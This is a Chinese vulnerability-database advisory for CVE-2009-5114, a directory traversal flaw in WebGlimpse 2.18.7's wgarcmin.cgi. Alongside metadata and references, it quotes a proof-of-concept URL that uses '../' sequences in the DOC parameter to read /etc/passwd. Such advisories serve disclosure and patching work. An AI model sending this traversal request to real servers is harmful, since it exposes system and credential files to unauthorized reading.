WebGlimpse ‘wgarcmin.cgi’ 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117602 漏洞类型 路径遍历
发布时间 2009-04-17 更新时间 2009-04-27
CVE编号 CVE-2009-5114 CNNVD-ID CNNVD-201203-338
漏洞平台 CGI CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/36994
https://www.securityfocus.com/bid/52651
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201203-338
|漏洞详情
WebGlimpse是一款基于Web的搜索和索引软件包,由公众维护,并由UniversityofArizona管理。WebGlimpse2.18.7及之前版本中的wgarcmin.cgi中存在目录遍历漏洞。远程攻击者可利用该漏洞借助在DOC参数中的..(点点),读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/52651/info

WebGlimpse is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.

Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.

WebGlimpse 2.18.7 is vulnerable; other versions may also be affected. 

http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
|受影响的产品
WebGlimpse WebGlimpse 2.18.7
|参考资料

来源:websecurity.com.ua
链接:http://websecurity.com.ua/2628/